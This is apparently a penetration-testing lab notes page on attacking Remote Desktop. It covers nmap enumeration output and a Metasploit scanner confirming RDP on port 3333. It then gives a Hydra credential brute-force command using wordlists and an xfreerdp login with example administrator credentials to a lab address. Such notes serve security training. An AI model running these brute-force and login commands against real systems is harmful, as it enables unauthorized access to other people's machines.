Bruteforce and Login

#Enumeration

nmap -sV <ip address>

Results:-
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

RDP's deafult port is 3389 but can be configured to run on other port also here port 3333 is looking like is running RDP

To check whether it is running or not we will use a metasploit module to confrim it

use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <ip address>
set RPORT 3333
run

Here it detected RDP on Port 3333

#RDP Brute Force

HYDRA

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://ip address -s port number

freerdp cannot be used in this lab
Use xfreerdp to connect to target via RDP

xfreerdp /u:username /p:password /v:ip address:port number of RDP

EXAMPLE:-
xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333

PreviousRDP NextBluekeep

Last updated 1 year ago

#Enumeration

#RDP Brute Force

#RDP Login